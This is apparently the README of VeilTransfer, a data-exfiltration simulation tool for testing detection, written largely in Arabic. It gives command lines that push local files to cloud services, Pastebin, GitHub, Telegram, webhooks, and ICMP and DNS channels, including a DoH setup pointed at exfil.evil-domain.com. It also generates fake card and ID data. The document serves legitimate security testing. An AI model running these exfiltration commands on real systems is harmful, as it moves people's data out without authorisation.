
VeilTransfer is a data exfiltration utility designed to test and enhance the detection capabilities. This tool simulates real-world data exfiltration techniques used by advanced threat actors, allowing organizations to evaluate and improve their security posture.
VeilTransfer هي أداة لاستخراج البيانات مصمَّمة لاختبار وتحسين قدرات الكشف. تحاكي هذه الأداة تقنيات استخراج البيانات الواقعية التي يستخدمها المهاجمون المتقدّمون، مما يتيح للمؤسسات تقييم وتحسين وضعها الأمني. من خلال الاستفادة من طرق متعددة لاستخراج البيانات مثل MEGA وGitHub وSFTP وWebDAV وغيرها، تساعد VeilTransfer في تحديد الثغرات في دفاعاتك وتضمن أن تكون حلولك الأمنية جاهزة لمواجهة خروقات البيانات الحديثة.
| ID | Techniques |
|---|---|
| T1029 | Scheduled Transfer |
| T1020 | Automated Exfiltration |
| T1132.001 | Data Encoding: Standard Encoding |
| T1560.002 | Archive Collected Data: Archive via Library |
| T1567.001 | Exfiltration Over Web Service: Exfiltration to Code Repository |
| T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage |
| T1567.003 | Exfiltration Over Web Service: Exfiltration to Text Storage |
| T1567.004 | Exfiltration Over Web Service: Exfiltration Over Webhook |
| T1048.003 | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol |
| T1048.002 | Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol |
يدعم VeilTransfer أيضًا توليد بيانات وهمية، بما في ذلك:
أنشئ ملفات zip بسهولة لتجميع البيانات وضغطها، والتي يمكن استخدامها بعد ذلك لاستخراج البيانات أو لاختبار سيناريوهات مختلفة. يدعم الأداة تقسيم الملفات اختياريًا إلى عدة أجزاء بناءً على الحجم.
يوضح هذا المثال كيفية نقل ملف بشكل آمن إلى خادم بعيد باستخدام بروتوكول SFTP. الملف موجود على الجهاز المحلي، ويتم نقله إلى الدليل البعيد المحدد باستخدام مصادقة SSH.
veiltransfer_client transfer sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass
في هذا المثال، يتم رفع الملفات من دليل محلي إلى خادم WebDAV. يتطلب الخادم اسم مستخدم وكلمة مرور للمصادقة. تتضمن معلمة الخادم مخطط URI (https:// أو http://).
veiltransfer_client transfer webdav -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass
يوضح هذا المثال كيفية نقل الملفات إلى وحدة تخزين سحابة Mega. يتم رفع الملفات من دليل محلي محدد، وتتم المصادقة باستخدام بيانات اعتماد مستخدم Mega Cloud.
veiltransfer_client transfer mega -localPath (/path/to/file or /path/to/directory) -username [email protected] -password megasecretpassword
في هذا المثال، يتم رفع ملف إلى خادم FTP. يتم نقل الملف إلى دليل محدد على الخادم البعيد. يتطلب الخادم اسم مستخدم وكلمة مرور للمصادقة.
veiltransfer_client transfer ftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword
يوضح هذا المثال كيفية رفع محتويات ملف إلى Pastebin. يتم نشر المحتوى على Pastebin باستخدام مفتاح API يوفره المستخدم.
veiltransfer_client transfer pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key
يوضح هذا المثال كيفية دفع ملف من الجهاز المحلي إلى مستودع GitHub محدد. تتم إضافة الملف إلى المستودع باستخدام رمز API الخاص بمستخدم GitHub للمصادقة.
veiltransfer_client transfer github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token
يوضح هذا المثال كيفية إرسال ملف إلى قناة Telegram محددة. يتم إرسال الملف باستخدام رمز API لبوت Telegram، ويتم تسليم الرسالة إلى معرف القناة المحدد.
veiltransfer_client transfer telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789
في هذا المثال، يتم إرسال محتويات ملف إلى عنوان Webhook محدد.
veiltransfer_client transfer webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url
لإنشاء آلية آمنة لاستخراج البيانات باستخدام DNS over HTTPS (DoH)، يجب تكوين سجلات DNS التالية:
سجل A: وجّه test إلى عنوان IP <VeilTransfer_IP_Address>.
test -> <VeilTransfer_IP_Address>
سجل NS: حدد نطاقًا فرعيًا (exfil) تتم إدارته بواسطة evil-domain.com.
exfil -> test.evil-domain.com
سيعمل النطاق exfil.evil-domain.com كنطاق استخراج DNS.
بعد ذلك، ابدأ خادم VeilTransfer في وضع DoH باستخدام الأمر التالي:
veiltransfer_server doh -key ag36rjsg284nfk2g -folder /root/data/exfil
ملاحظة: يجب أن يكون طول مفتاح التشفير (-key) 16 أو 32 حرفًا.
لرفع الملفات عبر DoH، تأكد من أن خادم VeilTransfer يعمل بنشاط في وضع DoH بمفتاح تشفير صالح. ثم ابدأ النقل باستخدام أمر العميل:
veiltransfer_client transfer doh -localPath /path/to/file_or_directory -key ag36rjsg284nfk2g -dnsServer exfil.evil-domain.com
لبدء تشغيل خادم VeilTransfer في وضع QUIC، استخدم الأمر التالي:
veiltransfer_server quic -cert /path/server.crt -key /path/server.key
بمجرد تشغيل الخادم، يمكنك رفع الملفات أو الدلائل باستخدام:
veiltransfer_client transfer quic -localPath (/path/to/file or /path/to/directory) -server example.com:443
لتمكين نقل الملفات عبر بروتوكول ICMP، ابدأ تشغيل خادم VeilTransfer في وضع ICMP عن طريق تنفيذ الأمر التالي:
veiltransfer_server_linux icmp -folder /path/folder
بمجرد أن يصبح الخادم نشطًا، نفّذ الأمر التالي لنقل الملفات أو الدلائل عبر ICMP:
veiltransfer_client_linux transfer icmp -localPath (/path/to/file or /path/to/directory) -server <ip address>
ينشئ أرشيف zip من دليل محدد.
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip
ينشئ أرشيف zip مقسمًا إلى عدة أجزاء بناءً على الحجم المحدد.
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000
يوضح هذا المثال كيفية توليد 100 إدخال لبيانات بطاقات ائتمان وهمية. ستتضمن البيانات التي يتم توليدها أرقام بطاقات الائتمان وتواريخ الانتهاء والتفاصيل المرتبطة بها.
veiltransfer_client generate-fake -ccn -count 100
يوضح هذا المثال كيفية توليد 50 إدخالًا لبيانات KTP وهمية، وهي بطاقات الهوية الإندونيسية. تتضمن البيانات معلومات شخصية مثل الاسم والعنوان ورقم KTP.
veiltransfer_client generate-fake -ktp -count 50
تتضمن البيانات التي يتم توليدها أرقام الضمان الاجتماعي المنسقة وفقًا للمعايير الأمريكية.
veiltransfer_client generate-fake -ssn -count 200
يوضح هذا المثال كيفية توليد 300 سجل طبي وهمي باللغة الإنجليزية.
veiltransfer_client generate-fake -medical-record -count 300 -language en
المساهمات في VeilTransfer مرحب بها! إذا كانت لديك أفكار لميزات جديدة أو طرق استخراج بيانات أو تحسينات، فيرجى إرسال طلب سحب (pull request) أو فتح مشكلة (issue) على GitHub.